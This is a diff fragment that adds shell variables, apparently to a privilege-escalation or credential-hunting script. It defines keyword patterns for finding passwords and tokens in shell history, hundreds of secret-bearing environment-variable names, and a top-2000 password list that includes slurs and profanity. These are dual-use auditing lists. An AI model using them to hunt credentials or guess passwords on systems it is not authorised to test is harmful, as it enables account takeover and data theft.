+pwd_inside_history="enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:"
+
+pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID"
+pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID"
+pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION"
+pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId"
+pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER"
+pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER"
+pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET"
+pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY"
+pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY"
+pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS"
+pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY"
+
+top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston \
+snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar \
+stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade \
+redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland \
+nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer \
